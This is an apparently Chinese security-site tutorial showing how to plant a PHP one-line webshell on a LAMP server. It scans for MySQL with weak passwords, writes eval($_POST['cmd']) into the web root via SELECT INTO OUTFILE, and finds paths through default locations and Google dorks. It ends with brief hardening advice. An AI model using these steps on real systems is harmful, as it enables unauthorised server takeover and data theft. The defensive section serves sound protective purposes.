首页 > 安全 > 网络安全 >

办公网攻击——一句话木马获得生产服务机上的任何信息(附防御方法)

2012-12-22

以LAMP架构为例解说第一步:使用sql扫描工具,获得内网中开放3306端口(sql server的默认端口号为1433),使用弱口令的主机第二步:远程登录该台主机mysql -u root -pselect "<?php eval($_POST[&#39;cmd&...

以LAMP架构为例解说

第一步:使用sql扫描工具,获得内网中开放3306端口(sql server的默认端口号为1433),使用弱口令的主机
第二步:远程登录该台主机
mysql -u root -p
select "<?php eval($_POST[&#39;cmd&#39;]); ?>" into outfile &#39;x:/文档根目录/xxx.php&#39;;
这时候我们遇到第一个难点,我们需要将该一句话木马上传到该主机的DocumentRoot下,而绝对路径名我们不知晓!!
尝试默认安装路径(很多测试用的服务器是没有修改基本配置的)
windows下,apache服务器的默认路径为"C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/"
linux下,apache服务器的默认路径为“var/www/"
windows下,使用xampp套装服务的默认路径为"c:/Program Files/xampp/htdocs/xampp/"


备注:如果该网站是发布在外网环境下,可以采用google hacker办法爆绝对路径
site:域名 Warning
site:www.2cto.com inurl:Warning

第三步:使用工具lanker微型PHP后门客户2.0正式版.htm,对方的任何信息都可以获取到
办公网攻击——一句话木马获得生产服务机上的任何信息 - danqingdani - 碳基体


防御措施:
1)最保险的
让你的相关服务只监听在本机,不让别人访问(或者根据实际情况按白名单开放访问权限)


a. apache的conf/httpd.conf 文件内找到 Listen 80那一行,改成 Listen 127.0.0.1:80
b. mysql的my.ini 文件内找到[mysqld]那一段,在port = 3306上加一行bind = "127.0.0.1"


2)使用高强度密码,如 ^mysql#xx.com.$ ,同时安装一个专业的密码管理软件,如开源的keepass

相关文章
最新文章
热点推荐